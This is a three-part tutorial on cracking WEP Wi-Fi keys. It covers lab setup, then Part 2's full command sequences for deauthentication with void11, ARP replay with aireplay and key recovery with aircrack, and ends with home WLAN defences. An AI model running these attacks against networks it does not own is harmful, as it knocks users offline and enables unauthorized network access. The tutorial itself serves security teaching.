Proper set up of your lab is important, because you want a controlled environment to practice in. You will also want to prevent collateral damage to neighboring APs that are not yours because some of the attacks described in Part 2 will forcibly knock clients off an AP. This could possibly wreak havoc with other wireless users in the area. So if you are in an office complex, apartment building or any other area with many wireless networks, it may be prudent to wait until night hours when the networks are less busy. Please practice safely and responsibly! The first step is to connect and configure a "target" wireless LAN comprised of an Access Point or wireless router and a single wireless client. This WLAN will be secured with the WEP key that you will be cracking. Give your AP an SSID of your choosing - we called ours "starbucks". Configure a 64 bit WEP key on the WAP to start - after you successfully break a 64 bit key, you can try a 128 bit key. You'll need to record the following information for later use:

MAC Address of the AP - This is usually displayed in the web configuration menu. It also may be found on a label on the bottom or side of the AP SSID of the AP Wireless channel of the AP - by default will probably be Channel 6, but make sure WEP key - If your AP displays the key as 0xFFFFFFFFFF (replace the F's with whatever your key is), write down only everything past the 0x

With the AP configured, we now need to get a client associated with it. (The following example uses Windows XP.) Right-click on the My Network Places icon on your desktop, or in your Start Menu. Then left-click Properties. Double-click the entry called Wireless Network Connection and a window similar to Figure 6 will open. Figure 6 shows that multiple WLANs are available, but your window may show only the "starbucks" AP that you just configured. Connect to your AP by double-clicking the corresponding SSID.

Figure 6: Connecting to your WAP

Because the AP has WEP enabled, Windows will ask for the network key in order to connect (Figure 7). Type in your WEP key (or cut and paste it from a Notepad or Wordpad document) and after a short wait Windows should report that you are connected to the network. Make sure that you are really connected by pinging a known computer on your wired LAN or opening your browser and checking your favorite website if your WLAN is connected to the Internet.

Figure 7: Entering WEP Key

If you can't get a successful ping or browse the web, open your wireless adapter's Network properties, click on the Support tab and check that you have valid IP address information. If you don't, check that your LAN's DHCP server is enabled and also check that the wireless adapter's TCP/IP properties are set to "Obtain an IP address automatically". You may also need to run a Repair on the connection.

Lab Setup - AP
Once you are successfully connected, record the MAC Address of target computer. You can do this by opening a command prompt window and entering the ipconfig /all command. You should get a screen similar to Figure 8, in which I've highlighted the wireless network adapter MAC address information.

Figure 8: Type in ipconfig /all to find the MAC Address

Since your client machine is running Windows XP, you can also get the MAC address from the Wireless Connection Status window. Click on the Support tab, then the Details button and the MAC address is right at the top (Figure 9), but of course called something different, i.e. "Physical Address".

Figure 9: MAC address in Network Connection Details

You will notice that in Windows, the MAC address numbers and letters are separated by dashes. The

dashes make the characters more readable, but the actual MAC address doesn't have dashes. At this point, our target WLAN is configured and working, so shut down the target client.

Lab Setup - Preparing the Notebooks

Now that the target computer has been set up, it's time to set up the notebooks that will scan for target WLANs and sniff traffic and run attacks to stimulate network traffic. First set your notebook to boot from its CD drive. It may be set this way by default, or you may have to change the boot order by changing BIOS settings. Next, shut down the notebook, insert a wireless card and Auditor Security Collection CD into the notebook and turn it on. After you pick the appropriate screen resolution from the Auditor boot menu, it will install to RAM and you will be presented with the Auditor start screen (Figure 10).

Figure 10: Auditor start screen

The two most important icons will be the Programs and Command Line icons, which are located at the bottom left side of the screen (Figure 11).

Figure 11: Programs and Command Line locations

Before you do anything else, you must make sure that your wireless network card has been recognized and configured by Auditor. Click on the command line icon to open a command line window, then type iwconfig. Among the other information that Audior spews out, you should see wlan0, which is the designation that Auditor gives to PRISM-based cards. If your screen looks similar to Figure 12, then Auditor has correctly detected your wireless card. You can now close out of the command line screen.

Figure 12: iwconfig to verify that the wireless card works

Repeat these same steps for your second notebook, then shut it down. You won't be needing it until Part 2, where you'll learn how to use it to stimulate WLAN traffic that will be captured by your first notebook.

Network Recon with Kismet

You're now ready to start Kismet, which is a Linux-based wireless scanner. It's a handy tool for surveying the wireless airwaves around you to find target wireless LANs to crack. Kismet also captures traffic, but there are other tools such as airodump (part of Aircrack) that do a better job in the context of cracking WEP. So we'll be using it to make sure our wireless card is working and for scanning for wireless networks. Then we will switch to different tools in Part 2 to actually sniff and capture traffic. You get to Kismet by clicking on the Programs icon, then Auditor, then Wireless, then Scanner/Analyzer, and finally Kismet (Figure 13).

Figure 13: Getting to Kismet

In addition to scanning wireless networks, Kismet captures packets into a file for later analysis. So Kismet will ask for the directory to save the captured files in. Click Desktop and then OK (Figure 14).

Figure 14: Specifying the Save Location

Kismet will then ask for a prefix for the captured files (Figure 15). Change the default name to capture and then click OK.

Figure 15: Specifying the file prefix

As Kismet starts, it will display all the wireless networks in range (Figure 16), which should hopefully include the target WLAN you set up. The channel number, under the Ch column, should match what you have written down. If Kismet has found many nearby access points, you may want to move the lab farther away from the Access Points, or disconnect any high-gain antennas you have connected.

Figure 16: Kismet at work

While Kismet is jumping through all the channels and SSIDs looking for interesting information, you will see the number of packets changing for all the access points. In the column at the right side of the screen, Kismet displays the total number of networks found, the number of packets captured and the number of encrypted packets seen. Even with the target computer off, Kismet is detecting packets from our AP. This is because APs send out "beacons", which tell wireless computers that an AP is in range. You can think of it as the AP announcing, "My name is XXXXX, please connect to me." Kismet starts in "autofit" mode, which doesn't list APs in any meaningful order. Press "s" to get to the Sort menu (Figure 17). Here you can specify sort orders, which will organize the APs better.

Figure 17: Sort options in Kismet

Press "c" and the access points will be ordered by channel. (Figure 18)

Figure 18: Sorting WAPs by channel

Kismet will by default hop through channels 1 to 11. Use the cursor keys to move the highlight bar to your SSID and press "L" (note capital "L") and Kismet will lock on the SSID's channel (Figure 19). You will notice that the packet numbers of other APs may still continue to increase. This is because many channels overlap each other in frequency.

Figure 19: Locking the channel scanning in Kismet

Now that we are reasonably sure that Kismet is working, let's see what happens when the target computer on the network starts transmitting information. In most cases, this will be receiving / sending of email or web surfing. Start the target computer, while keeping the scanning laptop in Kismet. As the target computer boots into Windows and connects to the target AP, you will notice a surge in regular and encrypted packets being captured by Kismet. You'll be using these packets in the attacks described in Part 2 of this series.

Conclusion
At this point, you know the basic approach to WEP cracking, have a target WLAN configured and have both sniffing and attack computers configured and working. You also have gained a basic familiarity with Auditor and used Kismet to find in-range wireless LANs. In Part 2, we will use the second notebook to stimulate the target LAN to generate wireless traffic that we will capture and perform the actual WEP key crack. Until then, you can familiarize yourself with Kismet, go WLAN hunting and explore some of the other tools on the Auditor CD.

To Explore Further
Tools Used

Auditor's Security Collection - Contains all the wireless hacking tools already installed Kismet July 1st, 2004 - Auditor Review (not current version)

Related Articles

Part 2: Performing the Crack

Introduction
In Part 1 of How to Crack WEP, we showed the basic approach to WEP cracking, configured a practice target WLAN and configured both sniffing and attack computers. We also introduced the Auditor Security Collection and used Kismet to find in-range wireless LANs. In this article, we will describe how to use additional tools found on the Auditor CD to capture traffic and use it to crack a WEP key. We'll also describe how to use deauthentication and packet replay attacks to stimulate the generation of wireless traffic that is a key element of reducing the time it takes to perform a WEP key crack. Before we get started, however, let us make a few points that may save some readers the time and effort of trying these techniques:

To successfully follow this How To, you need basic familiarity with networking terminology and principles. You should know how to ping, open a Windows Command Prompt, enter command lines and know your way around the Windows networking properties screens. Basic familiarity with Linux will be helpful too. These procedures assume the use of specific wireless hardware described in Part 1. They will not work with other hardware types without modification. These procedures assume that the target WLAN has at least one client associated with an AP or wireless router. They will not work with an AP that has no associated clients. This tutorial is based on the Auditor version released April 2005. Future versions could make this attack easier or harder. In addition, some of the commands shown are Auditor-specific scripts that don't exist (but can easily be made) in other Linux distributions. Accessing anyone else's network other than your own without the network owner's consent is illegal. SmallNetBuilder, Pudai, LLC and the author do not condone or approve of illegal use of this tutorial in any way

Also note that it is possible to perform WEP cracking using only one computer. But we have chosen to use two to more clearly illustrate the process and avoid some of the complications caused by using a single computer. The four main tools used in this article are airodump, void11, aireplay and aircrack, which are included on the Auditor Security Collection CD:

Airodump scans the wireless network for packets and captures these packets into files Void11 will deauthenticate computers from a wireless access point, which will force them to reassociate to the AP, creating an ARP request Aireplay takes this ARP request and resends it to the AP, spoofing the ARP request from the valid wireless client

Finally, aircrack will take the capture files generated by airodump and extract the WEP key

From your scanning with Kismet as described in Part 1, you should have written down the following four pieces of information:

MAC Address of the wireless Access Point (AP) MAC Address of the "Target" computer WEP key used Wi-Fi channel used

In the following procedures, we will call our laptops, Auditor-A and Auditor-B and call the target computer Target. Let's get started.

Starting from scratch

In real-life, someone trying to break into a wireless network usually would have to obtain the information needed (MAC address of the AP and Target PC and wireless channel). Professionals who do penetration testing of networks describe this attack as a "Zero Knowledge" attack, for obvious reasons. If the attacker already has all the information needed, that's called a "Full Knowledge" attack, which is nowhere near as challenging! We'll assume that we know nothing and describe how to get the information we need.

Finding the MAC Address of the AP with Kismet

Figure 1: Navigating Kismet

Finding the MAC Address of the AP is extremely easy with either Kismet or Netstumbler. Start Auditor-A with its Wi-Fi card and Auditor CD inserted. Once Auditor is up, start Kismet, just like you did in Part 1, and you will see a list of APs. Type s and then c to sort the APs by channel and using the arrow keys, move the highlight bar to your target AP's SSID. Then hit the Enter key. This will bring up

a detailed screen (Figure 2) that will show the selected AP's SSID, MAC address and channel. Voila! "Zero knowledge" has been transformed into almost all the information needed to run a WEP crack.

Figure 2: Kismet easily finds the SSID, Channel and MAC address

Tip: Some "security professionals" suggest cloaking your SSID / disabling SSID broadcasts. While this will defeat a Netstumbler scan, Kismet will easily detect "cloaked" SSIDs. Kismet captures more network information than Netstumbler and can find AP SSID's by following conversations between associated clients and the AP.

Finding the MAC Address of the Client

We need one last piece of information to begin our cracking - the MAC address of a wireless client associated to the AP of our Target WLAN. Go back to Kismet and type q to quit out of the details menu. The highlight bar should still be on your AP, if it isn't, then use the arrow keys again. Typing shift-C will bring up a list of clients. The MAC addresses are listed on the left side (Figure 3).

Figure 3: Client MAC address found by Kismet

If you don't see the MAC address of the TARGET computer, check to make sure it's on and associated with the Target AP (boot the TARGET into Windows, have it connect to the AP and start browsing the web). In about 10-30 seconds, you should see the MAC address of the TARGET computer pop up in Kismet. A prudent cracker would probably record all the client MAC addresses found so as not to be thwarted if a client isn't present when the time comes to start the cracking process.

Packet capture with Airodump

Figure 4: Airodump usage

As amazingly fast as aircrack is, it still needs a sufficient number of "interesting" packets to work on in order to crack a WEP key. As we noted earlier, packet capture is done by airodump, which creates a file of captured data for aircrack. Let's see how it's done. You can use either computer, but we'll stick with Auditor-A. Open the shell and type in the following commands: Commands for setting up airodump
iwconfig wlan0 mode monitor

iwconfig wlan0 channel THECHANNELNUM cd /ramdisk airodump wlan0 cap

NOTES: - Replace THECHANNELNUM with the channel number of your Target WLAN - The /ramdisk directory is where the capture data will be stored If there are many wireless access points close by, you may want to use attach the MAC address of your target AP to the end of the airodump command like so:
airodump wlan0 cap1 MACADDRESSOFAP

This will instruct airodump to write only the packets of the target AP to the capture file. You can exit out of Airodump by typing Control-C. Typing ls -l will list the contents of the directory. Notice the size of the capture file which has the extension of .cap. If packets were successfully captured, the file size should be a few kB or so after a few seconds of capture. Note that if Airodump is stopped and restarted with the same parameters, the new capture file will appended to the previous one. You may want to make separate files by naming the first file cap1, the next, cap2 and so on.

Collecting IVs with Airodump

Figure 5: Watch the IV count go up

While airodump is running, you should see the MAC address of your AP listed under BSSID on the left side of the window. You should also see the Packet count and IV count (Initialization Vector) going up. This is due to normal Windows network traffic that is generated even if you aren't surfing the web or checking your email. So you will see the IV count rise by a few IVs after a while. If you start surfing the web on the TARGET computer, you should see that each new webpage raises the IV count in airodump. We aren't interested in the Packet count, because doesn't help us with WEP cracking and many of the packets will be beacons coming from the AP. (Most APs send out ten beacons a second by default and you will see that reflected in the packet count in airodump.) The IV count is the important number to watch for since you will need to capture around 50,000 to 200,000 IVs in order to crack a 64 bit WEP key and for a 128 bit key, you will need around 200,000 to 700,000 IVs!

Deauthentication via void11

You probably noticed that the IV count doesn't rise very quickly under normal traffic conditions. In fact, it could take several hours or even days, to capture enough data from most wireless LANs for a successful WEP key crack under normal conditions. But fortunately, there are a few tools at our disposal to speed things along. The easiest way to speed up packet generation is for the Target WLAN to be a busy one. We can simulate this by running a continuous ping or starting a large file download on the Target. Keep airodump running on Auditor-A and notice the rate that the IV count is rising. Then start your file download via bittorrent or just download an .ISO file of your favorite Linux distribution or movie trailer. Alternatively, a continuous ping can be done in Windows by entering the following into a command window:
ping -t -l 50000 ADDRESS_OF_ANOTHER_LAN_CLIENT

where ADDRESS_OF_ANOTHER_LAN_CLIENT is replaced by the IP address of the AP, router or any other pingable client on the LAN. Either of these methods will cause the IV count to rise a bit faster. But since they require access to the very WLAN that you are trying to obtain the WEP key for, they're useful only to illustrate that more traffic = more IVs. What is needed is a traffic-generation method that requires only the information that we've obtained via Kismet. This is where void11 comes in. Void11 is used to force a de-authentication of wireless clients from their associated AP,i.e. the clients are "kicked off" the AP. After being kicked off the wireless network, a wireless client will automatically try to reassociate with the AP. In the process of re-association, data traffic will be generated. This process is commonly referred to as a de-authentication or deauth attack. Here's how it's done.

Figure 6: void11 usage

Start Auditor-B with its Wi-Fi card and Auditor CD inserted. Once Auditor is up, open a shell and type

in the following commands: Commands for setting up a void11 deauth attack

switch-to-hostap cardctl eject cardctl insert iwconfig wlan0 channel THECHANNELNUM iwpriv wlan0 hostapd 1 iwconfig wlan0 mode master void11_penetration -D -s MACOFSTATION -B MACOFAP wlan0

NOTE: Replace THECHANNELNUM with the channel number of your Target WLAN, and MACOFSTATION and MACOFAP with the MAC addresses of the Target WLAN client and AP respectively, i.e.
void11_penetration -D -s 00:90:4b:c0:c4:7f -B 00:c0:49:bf:14:29 wlan0

Tip: You may see an invalid argument error while running void11 on the Auditor Security Collection. Don't worry about this error, as void11 is working, which we'll verify next.

Verifying the deauth

While void11 is running on Auditor-B, let's look at what's happening on the Target client. Normally, anyone using a Target client will be happily be surfing websites or checking email, when suddenly the network will get very slow and eventually come to a halt. A few seconds later, the Target will be completely disconnected from the network. You can check this out for yourself by running a continuous ping from TARGET to the wireless access point. Figures 7 and 8 show a ping before and during a void11 deauth attack.

Figure 7: Successful pings before void11

Figure 8 shows that the pings will time out while void11 is running. If you do a Control-C on AuditorB to stop the void11 attack, the pings will come back to life after a few seconds.

Figure 8: Pings die after void11 is started

You can see if you are being deauthenticated from an AP by looking at your wireless client's utility program, which usually indicates the connection status. Figures 9 and 10 show the wireless client utility built into Windows WP. Before the void11 attack starts, everything will seem normal, and Windows will show that you are connected to the AP (Figure 9).

Figure 9: Now you are connected

After void11 starts, the network status will change from connected to disconnected (Figure 10). After void11 is stopped on Auditor-B, the Target will reconnect back to the AP in a few seconds or so.

Figure 10: Now you aren't!

If you look back at Auditor-A - which we last left running airodump - while void11 is running, the IV count in airodump should increase to around 100-200 with a few seconds. This is due to the traffic generated by the Target client as it repeatedly tries to reassociate with its AP.

Packet replay via Aireplay

While a deauth attack generates traffic, it generally doesn't generate enough to effectively speed up our IV gathering process. It's also a pretty blunt instrument and severly interferes with normal WLAN operations. For more efficient traffic generation, we'll need to employ a different technique called a replay attack. A replay attack simply captures a valid packet generated by a Target client, then spoofs the client that it captured the packet from and replays the packet over and over again more frequently than normal. Since the traffic looks like it is coming from a valid client, it doesn't interfere with normal network operations and goes about its IV-generating duties quietly. So what we need is to capture a packet that is sure to be generated by the void11 deauth attack, stop the deauth attack, then start a replay attack using the captured packet. A perfect candidate for capture are Address Resolution Protocol (ARP) packets since they're small (68 Bytes long), have a fixed and easily recongnizable format, and are part of every reassociation attempt.

Figure 11: aireplay setup

Let's start with a clean slate and reboot both Auditor-A and Auditor-B. Figure 12 shows the roles that Auditor-A and Auditor-B are playing. Notice that Auditor-A is running only aireplay and is just serving to stimulate traffic (and IVs) to shorten the time it takes to crack a WEP key. Also notice that Auditor-B is used for either running the deauth attack (via void11) or capturing traffic (via airodump) and running the actual crack against the captured data via aircrack which we'll get to shortly.

Figure 12: The full WEP-cracking monty

We'll first start aireplay. Go to Auditor-A, open a shell and type in these commands: Commands to set up aireplay to listen for an ARP packet
switch-to-wlanng cardctl eject cardctl insert monitor.wlan wlan0 THECHANNELNUM cd /ramdisk aireplay -i wlan0 -b MACADDRESSOFAP -m 68 -n 68 -d ff:ff:ff:ff:ff:ff

NOTES: - switch-to-wlanng and monitor.wlan are custom scripts that come installed on the Auditor CD to simplify commands and reduce typing - Replace THECHANNELNUM with the channel number of your Target WLAN At first, nothing too exciting will happen. You should see aireplay reporting it has seen a certain number of packets, but little else since the packets haven't matched the filter we've set (68 Byte packet with a destination MAC address of FF:FF:FF:FF:FF:FF). Now go to the Target client computer and open its wireless utility so that you can monitor its connection status. Then go to Auditor-B and start a void11 deauth attack by following the previous instructions. Once you've started void11, you should see the Target client lose contact with the Target AP. You should also see see the packet rate reported by aireplay increase at a faster rate. At some point, aireplay will display a captured packet and ask if you want to replay it (Figure 13).

Figure 13: aireplay bags a packet

You want a packet that matches the following criteria (also illustrated in Figure 13):

FromDS - 0 ToDS - 1 BSSID - MAC Address of the Target AP Source MAC - MAC Address of the Target computer Destination MAC - FF:FF:FF:FF:FF:FF

Type n (for no) if the packet does not match these criteria and aireplay will resume capture. When aireplay successfully finds a packet matching the above criteria, answer y (for yes) to the replay question and aireplay will switch from capture to replay mode and start the replay attack. Immediately go back to Auditor-B and stop the void11 deauth attack. Tips: - The capture of a packet via a deauth attack can be the trickiest part of the WEP cracking process. While the deauth attack generates traffic, it generally doesn't generate very much because of the time it takes for a client to realize that it has lost connection with its AP and then more time for the re-association process to complete. - Capture can be further complicated by the fact that the timing of these processes is different among client drivers (and operating systems). void11 can easily overwhelm a client with deauth packets so that it doesn't even have time to complete a re-association and generate the packets we'll be looking to capture. - Sometimes you may luck out with the first packet captured. But other times you may have to wait for multiple captures. - If aireplay doesn't produce a captured packet within a few thousand packets, void11 could be overwhelming the AP and client and not giving them any time any time to complete a reassociation. Try stopping void11 manually (control-C) and then restarting it. You can also try adding the -d parameter to the void11 command line (the delay value is in microseconds) and experimenting with different values to allow time for a successful reassociation. Be aware that some wireless clients lock up when subjected to a deauth attack and may need to be rebooted to recover! - You may have difficulty capturing ARP packets via a deauth attack if the Target client is idle. This is unlikely to happen with a real Target WLAN, but could be a problem with your practice Target WLAN. If aireplay is not flagging packets for you to approve, you may need to go to your Target client and run a continuous ping or start a download before you start the deauth attack. - As a final tip, if you absolutely cannot get void11 to work, you can test if aireplay is really working by cheating a little bit. Keep aireplay running on AUDITOR-A and turn off void11 on AUDITOR-B. Go to the TARGET computer and manually disconnect from the wireless network. You can do this through either the wireless connection properties or by simply turning the computer off. Now reconnect the computer or turn the computer back on. Within thirty seconds, aireplay on AUDITOR-A should see an ARP packet sent by the TARGET computer as it reconnects to the WLAN and requests an IP address.

Packet capture and cracking

At this point Auditor-A is running a replay attack and producing plenty of IVs. Now it's finally time to do the actual WEP cracking. Stop void11 on AUDITOR-B, if you haven't done so already. Type in the following commands to set up airodump to capture packets for cracking. Starting up airodump after stopping void11
switch-to-wlanng cardctl eject cardctl insert monitor.wlan wlan0 THECHANNELNUM cd /ramdisk airodump wlan0 cap1

NOTES: - switch-to-wlanng and monitor.wlan are custom scripts that come installed on the Auditor CD to simplify commands and reduce typing - Replace THECHANNELNUM with the channel number of your Target WLAN - If there are many wireless access points in range, append the MAC address of your target AP to the end of the airodump command, i.e. airodump wlan0 cap1 MACADDRESSOFAP After airodump starts, you should now see the IV count rise to about 200 per second, thanks to the aireplay replay attack running on Auditor-A

Figure 14: After ten minutes of aireplay

With airodump writing IVs into a capture file, we can run aircrack at the same time to find the WEP key. Keep airodump running and open another shell window. Type the following commands into the new window to start aircrack: Starting aircrack
cd /ramdisk aircrack -f FUDGEFACTOR -m MACADDRESSOFAP -n WEPKEYLENGTH -q 3 cap*.cap

NOTES: - FUDGEFACTOR is an integer (default is 2) - MACADDRESSOFAP is the MAC address of the Target AP - WEPKEYLENGTH is the length of the WEP key you are trying to crack (64, 128, 256 or 512) Figure 15 shows an example of a complete command.

Figure 15: aircrack usage

Aircrack will read in unique IVs from all the capture files and then perform a statistical attack on those IVs. A lower "fudge factor" (-f parameter) has less chance of succeeding, but is very fast. A high fudge factor is slower, but has a higher chance of finding the WEP key. A fudge factor of 2 is the default starting point. You can stop aircrack by typing control-C or just let it run to completion (it will give up after awhile if it doesn't find the WEP key, at least for 64 bit WEP keys). If you followed our syntax above, you can simply hit the up arrow then enter. You can then restart aircrack by hitting the up arrow then enter keys, and aircrack will automatically include the updated contents of the airodump capture file. At some point, you should be rewarded with the screen shown in Figure 16.

Figure 16: Gotcha, Key Found!

Helpful hints
We broke a 64 bit WEP key in less than five minutes, which is the combined time for scanning with airodump and cracking with aircrack and stimulating traffic with aireplay running a simultaneous replay attack. There is a lot of luck involved and sometimes you may break the WEP encryption after gathering just 25,000 IVs, but most times it takes more than 100,000. You would expect a 128 bit key to take eons longer, but this is not the case. A 128 bit key can be broken with around 150,000 to 700,000 IVs. bit capturing more IVs will definitely speed up the cracking process. When we reconfigured our target AP with a 128 bit key, we were able to recover the WEP key with 200,000 IVs, but it took the laptop we used more than an hour. Having more captured IV's would have sped up the process dramatically. It's important to note that you must input the length of the WEP key that you are trying to recover into aircrack and that none of these tools provide that information. While you know this information in your practice target WLAN, you wouldn't know it in a zero knowledge exploit. So you may need to try both 64 and 128 WEP key lengths in aircrack in order to be successful.

Figure 17: 128 bit WEP key found

Using a notebook with a fast processor and lots of memory for "Auditor-B" can help speed things along. You can also offload the capture files to other computers to speed up the cracking, while continuing to capture packets. We tested out this technique at the 2005 Interop Convention in Las Vegas. While one laptop was running airodump, we copied the capture files over to a very speedy server for cracking. The server (running aircrack) doesn't need wireless access since it just crunches away on the captured files. It goes without saying that you should use the fastest computer you can find to run aircrack. The new dual core processors from AMD and Intel may provide a speedup in WEP cracking since aircrack can spawn multiple processes with the -p option. You may find it convenient to save your capture files to a USB flash drive to "sneakernet" them to other computers. Simply open the shell and type the following: Saving capture files to USB flash drive
mkdir /mnt/usb mount -t vfat /dev/uba1 /mnt/usb copy /ramdisk/cap*.cap /mnt/usb umount /mnt/usb Note that you must perform a umount to actually write the files to the flash drive.

Conclusion
WEP was never meant to secure a network, but was designed only to provide a WLAN with the level of security and privacy comparable to that expected of a wired LAN. This is clearly indicated by its full name, "Wired Equivalent Privacy". Recovering a WEP key is the equivalent of gaining physical access to a wired network. What happens next depends on the steps that have been taken to secure resources of the network itself. Enterprise networks most always require a user login, i.e. authentication, before allowing access to their networks. Servers are physically secured in locked server rooms and network wiring panels secured in locked closets. Networks are frequently segmented so that users are kept from accessing shares and servers that they have no need to access. Unfortunately, trained in bad security habits by both Microsoft and Apple, most home PC users avoid logins and password-protected network shares like the plague. And while home networks may have made Internet and printer sharing possible, the combination of networked computers and poor security practices has turned more than one home network into a unholy mess of worm-infested zombies before people even know what hit them. WEP was shown to have failed in its function shortly after 802.11 networks came into widespread use and the industry has been playing catch-up ever since. Key rotation, stronger IVs and other proprietary schemes were tried first. But businesses quickly realized that these measures were ineffective and either closed down their wireless LANs entirely or segregated them into limited-access separate networks, required the use of VPNs or took additional security measures. Fortunately, the wireless equipment makers quickly realized that stronger measures were needed if they were to be able to continue to sell wireless products to businesses and more security-conscious home networkers. The answer came in the late fall of 2002 in the preliminary form of Wi-Fi Protected Access or WPA and followed a year or so later by the current improved version - WPA2. Despite the industry's foot-dragging in getting both technologies out to its users (and providing updates for existing products), either technology - even in its simplified "Personal" (or "PSK") form that uses password-based protection - will provide the level of security originally envisioned for WEP as long as a sufficiently random and long password is used. In Part 3 of this series, we will demonstrate some good and not so good ways to protect your network. But in the meantime, our basic recommendation is to secure your wireless LAN by using WPA or WPA2 (with a strong password), or turn off wireless access until you can. We hope that these articles have shown that WEP is simply not an option for real "wired equivalent" security.

To Explore Further
Tools Used

Auditor's Security Collection - Contains all the wireless hacking tools already installed Kismet

Airsnort Aircrack (includes Aireplay and Airodump) void11

Related Articles

August 2, 2004 - Defcon 12: Hackers in Vegas August 2, 2004 - Black Hat: Day 2 Sounds Security Alarm July 30, 2004 - Black Hat Briefings Day 1 July 1, 2004 - Auditor Review (be advised that this version is old)

Command Summary
Commands for setting up airodump
iwconfig wlan0 mode monitor iwconfig wlan0 channel THECHANNELNUM cd /ramdisk airodump wlan0 cap

Commands for setting up a void11 deauth attack

switch-to-hostap cardctl eject cardctl insert iwconfig wlan0 channel THECHANNELNUM iwpriv wlan0 hostapd 1 iwconfig wlan0 mode master void11_penetration -D -s MACOFSTATION -B MACOFAP wlan0

Commands to set up aireplay to listen for an ARP packet

switch-to-wlanng cardctl eject cardctl insert monitor.wlan wlan0 THECHANNELNUM cd /ramdisk aireplay -i wlan0 -b MACADDRESSOFAP -m 68 -n 68 -d ff:ff:ff:ff:ff:ff

Starting up airodump after stopping void11

switch-to-wlanng cardctl eject cardctl insert monitor.wlan wlan0 THECHANNELNUM cd /ramdisk airodump wlan0 cap1

Starting aircrack
cd /ramdisk aircrack -f FUDGEFACTOR -m MACADDRESSOFAP -n WEPKEYLENGTH -q 3 cap*.cap

Part 3: Securing your WLAN

Introduction
After demonstrating in How To Crack WEP - Part 1 and Part 2 that WEP cracking is easier than you may have thought, I will now switch gears. In this last part of the WEP Crack How To, I will show you how to take a common sense approach to protecting your wireless network. As any security professional knows, there is no such thing as perfect security. A good security plan takes into account the value of what needs to be protected, the cost of implementing the protection and the nature and skillset of the potential intruder in order to formulate an effective security plan. In other words, rather than implementing every defensive measure known to man, a more prudent (and costeffective) approach may be to tailor your defense to the threats that you most likely face. For example, wireless networks located in cities generally face more possible intrusions than those located in sparsely-populated areas. During the course of a day in a city, dozens, maybe hundreds of people may pass by your wireless LAN. And a car could also be parked outside your home for hours, without attracting notice. But a wireless AP located in a home on a ten-acre farm would be unlikely to see any client but its owner's and any unfamiliar vehicles would be noticed and investigated in short order.

Why Bother?
For some people, setting up a secure wireless network is so daunting, they give up and run it wide open, ie. unsecured. I also hear people say, "I just surf the web and have nothing valuable on my computer. Why should I bother with security?" Good question, but here are some equally good answers. Running your WLAN wide open entails three major risks: 1) Your network resources are exposed to unknown users Once someone wirelessly connects to your LAN, they have the same access as users directly connected into your LAN's Ethernet switch. Unless you have taken precautions to limit access to network resources and shares, intruders can do anything trusted, known users can do. Files, directories, or entire hard drives can be copied, changed or entirely deleted. Or worse, keystroke loggers, Trojans, zombie clients or other programs can be installed and left to work for their unknown masters. 2) All of your network traffic can be captured and examined With the right tools, web pages can be reconstructed in real-time, URLs of websites you are visiting captured, and most importantly passwords you enter stolen and logged for future

mis-use, most notably identify theft. 3) Your Internet connection can be used for illegal, immoral or objectionable activities If your open WLAN is used to transfer bootleg movies or music, you could possibly be the recipient of a lawsuit notice from the RIAA. In a more extreme case, if your Internet connection were used to upload child pornography to an FTP site, or used to host the server itself, you could face more serious trouble. Your Internet connection could also be used by spammers, DoS extortionists and purveyors of malware, viruses and their like. It may be a noble sentiment to give free Internet access to anyone within range of your wireless LAN. But unless you put some serious protection between your "open" LAN and the one you use, you are exposing your data, and perhaps more, to serious risk. The approach I'll take in formulating WLAN security recommendations is based on the expected skill level of potential wireless intruders. I'll then provide recommended security countermeasures for each skill level. NOTE: I will generally use "AP" (Access Point) throughout this article, but this should be read as meaning "Access Point or wireless router".

Skill Level 0: Anyone with a wireless computer

It doesn't take special skills to "hack" an unprotected wireless LAN - anyone with a wireless-enabled computer and the ability to turn it on is a potential intruder. Ease of use is often touted as a selling point of wireless networking products, but this often is a double-edged sword. In many cases, people innocently turning on their wireless computers will either automatically connect to your access point or see it in a list of "available" access points. The following countermeasures should help in securing your network against casual access, but offer no real protection against more skilled intruders. These are listed in relative order of importance. But most of them are so easy to do that I recommend doing them all if your equipment allows. Countermeasure 1: Change Your Default Settings At minimum, change the administration password (and username if your equipment allows), and default SSID on your AP or wireless router. Admin passwords for most consumer wireless gear are widely available. So if you don't change yours, you could find yourself locked out of being able to control your own WLAN (until you regain control via a factory reset)! Changing the default SSID is especially necessary when you are operating in proximity of other APs. If multiple APs from the same manufacturer are in the area, they will have the same SSID and client PCs will have a good chance of "accidentally" connecting to APs other than their own. When you change the SSID, don't use personal information in your SSID! During my Netstumbler sessions, I have seen the following as SSIDs:

First and Last names Street Addresses with apartment numbers

Social Security Numbers Phone Numbers

Changing the default channel of your AP might help you avoid interference from nearby wireless LANs, but it has little value as a security precaution since wireless clients generally automatically scan all available channels for potential connections. Countermeasure 2: Upgrade Your Firmware, and maybe Hardware Having the most current firmware installed on your AP can sometimes help improve security. Updated firmware often includes security bug fixes and sometimes adds new security features. With some newer consumer APs, a single click will check for and install new firmware. This is in contrast to older APs which required the user to look up, download and install the latest firmware from a sometimes difficultto-navigate support site. APs that are more than a few years old have often reached their end of support lifecycle, meaning that no new firmware upgrades will be made available. If you find that your AP's latest firmware doesn't support at least the improved security of WPA (Wi-Fi Protected Access), and preferably the latest version called WPA2, you should seriously consider upgrading to new gear. The same goes for your wireless clients! Virtually all currently-available 802.11g gear supports at least WPA and is technically capable of being upgraded to WPA2. But manufacturers are not always diligent in their support of older products, so if you want to be sure that your gear supports WPA2, either check the Wi-Fi Alliance's certification database, or do some Googling in both the Web and Groups. Countermeasure 3: Disable SSID broadcast Most APs allow users to disable SSID broadcasting, which will thwart a Netstumbler scan. This will also stop Windows XP users using XP's built-in Wireless Zero Configuration utility and other client applications from initially seeing the wireless network. Figure 1 shows the control labeled "Hide ESSID" that will do the trick on a ParkerVision access point. ("SSID" and "ESSID" both refer to the same thing.)

Figure 1: Disabling SSID Broadcast on a Parkervision AP

NOTE: Disabling SSID broadcast will not prevent a potential intruder using Kismet or other wireless survey tools such as AirMagnet from seeing your wireless network. These tools don't rely on SSID broadcast for available network detection.

Countermeasure 4: Turn it off! People commonly overlook the simplest way of securing their wireless network - turning off the AP! A simple lamp timer can be used to turn off your AP during the overnight hours when you're not using it. If you have a wireless router, this will mean that your Internet connection will also be disabled, which also isn't such a bad thing. If you can't or don't want to periodically shut down your Internet connection, you'll have to remember to disable your wireless router's radio manually - if it has this feature. Figure 2 shows a typical wireless disable control. This manual method is more prone to error, however, since it's just one more thing to forget. Perhaps at some point manufacturers will add radio disable to the features that can be scheduled on wireless routers.

